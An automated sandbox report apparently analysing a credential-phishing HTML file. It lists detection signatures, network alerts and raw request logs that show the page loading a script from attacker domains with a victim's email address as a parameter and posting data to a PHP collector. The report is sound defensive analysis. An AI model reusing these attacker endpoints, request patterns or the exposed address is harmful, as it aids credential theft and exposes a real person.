Edit tour

Windows Analysis Report
Play_VM-Now(bfrieden)VWAV.xhtml

Overview

General Information

Sample name:	Play_VM-Now(bfrieden)VWAV.xhtml
Analysis ID:	1640958
MD5:	4ec819c3f14bf6fc398dfb01b82a1054
SHA1:	bd48616106a33e2cfb81279e3dc236244c843be1
SHA256:	38d574361c4c881e32d4c2ef098b77795ea38559fca60dbd7f20cd694399837b
Infos:

Detection

HTMLPhisher

Score:	80
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Suricata IDS alerts for network traffic

Yara detected HtmlPhish10

AI detected suspicious Javascript

HTML IFrame injector detected

HTML Script injector detected

HTML document with suspicious name

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

IP address seen in connection with other malware

Invalid 'forgot password' link found

No HTML title found

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w11x64_office

chrome.exe (PID: 4176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)

chrome.exe (PID: 5628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2004,i,8860473447837031108,2127390397510089652,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2124 /prefetch:11 MD5: DBE43C1D0092437B88CFF7BD9ABC336C)

chrome.exe (PID: 6212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Play_VM-Now(bfrieden)VWAV.xhtml" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.5.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Suricata Signatures

ETPRO PHISHING Successful Generic Phish 2021-03-25

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T22:35:29.378727+0100	2847819	1	Successful Credential Theft Detected	192.168.2.24	60846	104.168.138.190	443	TCP
2025-03-17T22:35:40.593257+0100	2847819	1	Successful Credential Theft Detected	192.168.2.24	60850	104.168.138.190	443	TCP
2025-03-17T22:36:01.755193+0100	2847819	1	Successful Credential Theft Detected	192.168.2.24	60855	104.168.138.190	443	TCP
2025-03-17T22:36:32.007902+0100	2847819	1	Successful Credential Theft Detected	192.168.2.24	63143	104.168.138.190	443	TCP

Joe Sandbox Signatures

• Phishing
• Compliance
• Networking
• System Summary

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml

Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.4.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 0.5.pages.csv, type: HTML
Source: Yara match	File source: 0.4.pages.csv, type: HTML
Source: Yara match	File source: 0.6.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.0..script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Play_VM-Now(bfriede... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. It creates an iframe, loads a script from an untrusted domain, and passes a user identifier to that script, which is a clear indication of malicious intent. The overall behavior of this script is highly suspicious and poses a significant security risk.

HTML IFrame injector detected

Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml

HTTP Parser: New IFrame

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: New script tag found

Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml

HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml

HTTP Parser: Invalid link: Forgot Password?

Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: HTML title missing

Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml

HTTP Parser: <input type="password" .../> found

Source: Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 142.250.186.132:443 -> 192.168.2.24:60828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.24:60830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.24:60831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.24:60833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.24:60837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.24:60836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.24:60838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.24:60841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.24:60843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.24:60844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.24:60846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.24:60849 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.24:60846 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.24:60850 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.24:60855 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.24:63143 -> 104.168.138.190:443

Source: global traffic

TCP traffic: 192.168.2.24:60842 -> 185.174.100.76:8254

Source: global traffic

TCP traffic: 192.168.2.24:63134 -> 1.1.1.1:53

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 185.174.100.20 185.174.100.20
Source: Joe Sandbox View	IP Address: 199.232.192.193 199.232.192.193

Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /muk/xls/m1u2k.js?uid=bfrieden@cosb.org HTTP/1.1Host: office.avcbtech.storeConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /start/xls/includes/css6.css HTTP/1.1Host: sender.linxcoded.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /muk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /muk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=113011ed5fd7a342940c9ddd5f375d13
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /muk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=113011ed5fd7a342940c9ddd5f375d13
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /muk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=113011ed5fd7a342940c9ddd5f375d13
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: office.avcbtech.store
Source: global traffic	DNS traffic detected: DNS query: sender.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: i.imgur.com
Source: global traffic	DNS traffic detected: DNS query: server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: _8254._https.server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: avcbtech.site

Source: unknown

HTTP traffic detected: POST /muk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveContent-Length: 42sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: chromecache_46.1.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: chromecache_52.1.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_52.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)

Source: unknown	Network traffic detected: HTTP traffic on port 60848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60817
Source: unknown	Network traffic detected: HTTP traffic on port 60831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63145 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60850
Source: unknown	Network traffic detected: HTTP traffic on port 60838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60858
Source: unknown	Network traffic detected: HTTP traffic on port 60844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60852
Source: unknown	Network traffic detected: HTTP traffic on port 60849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60828
Source: unknown	Network traffic detected: HTTP traffic on port 60830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60865
Source: unknown	Network traffic detected: HTTP traffic on port 60846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60838
Source: unknown	Network traffic detected: HTTP traffic on port 60817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60837
Source: unknown	Network traffic detected: HTTP traffic on port 63137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63143
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63146
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63145
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63148
Source: unknown	Network traffic detected: HTTP traffic on port 60865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63147
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60830
Source: unknown	Network traffic detected: HTTP traffic on port 60847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60849
Source: unknown	Network traffic detected: HTTP traffic on port 63148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60857 -> 443
